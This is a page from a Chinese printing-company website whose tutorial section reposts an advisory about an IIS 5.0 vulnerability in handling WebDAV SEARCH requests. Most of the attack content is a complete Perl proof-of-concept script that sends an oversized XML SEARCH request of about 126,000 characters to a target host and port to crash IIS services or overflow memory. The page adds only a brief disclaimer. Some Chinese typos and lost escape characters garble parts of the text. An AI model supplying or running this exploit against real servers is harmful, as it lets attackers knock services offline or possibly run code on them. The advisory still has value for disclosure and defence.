快精灵印艺坊 您身边的文印专家
广州名片 深圳名片 会员卡 贵宾卡 印刷 设计教程
产品展示 在线订购 会员中心 产品模板 设计指南 在线编辑
 首页 名片设计   CorelDRAW   Illustrator   AuotoCAD   Painter   其他软件   Photoshop   Fireworks   Flash  

 » 彩色名片
 » PVC卡
 » 彩色磁性卡
 » 彩页/画册
 » 个性印务
 » 彩色不干胶
 » 明信片
   » 明信片
   » 彩色书签
   » 门挂
 » 其他产品与服务
   » 创业锦囊
   » 办公用品
     » 信封、信纸
     » 便签纸、斜面纸砖
     » 无碳复印纸
   » 海报
   » 大篇幅印刷
     » KT板
     » 海报
     » 横幅

IIS 处理 SEARCH 哀求漏洞

涉及程序:
IIS
  
描述:
通过构造特别的 SEARCH 哀求导致 IIS 执行攻击者代码漏洞
  
具体:
发现 IIS 在处理 SEARCH 哀求时存在漏洞,攻击者通过提交构造特别的 IIS SEARCH 哀求能重启与 IIS 相关的所有服务,而且可能远程执行任意代码。

以下代码仅仅用来测试和研究这个漏洞,假如您将其用于不正当的途径请后果自负



Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCHnWritten by Georgi Guninski wait some timen";
if(@ARGV < 2) { die "nUsage: IIS5host port n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
$xml=\\'<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE
("\\'.$over.\\'")</D:sql></D:searchrequest>\\'."n";
$l=length($xml);
$req="SEARCH / HTTP/1.1nContent-type: text/xmlnHost: $hostnContent-length: $lnn$xmlnn";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

受影响系统:
IIS 5.0  

返回类别: 教程
上一教程: XML、Web服务和.NET框架(1) 
下一教程: “file”与“virtual”的区别

您可以阅读与"IIS 处理 SEARCH 哀求漏洞"相关的教程:
· 微软修补其IIS软件中的又一处安全漏洞
· Win2k IIS 远程执行命令漏洞
· ASP漏洞集-MS IIS SERVER/FRONTPAGE EXT SERVER
· 使用SQL MAIL收发和自动处理邮件
· 准确处理ASP动态网页中的容错机制
    微笑服务 优质保证 索取样品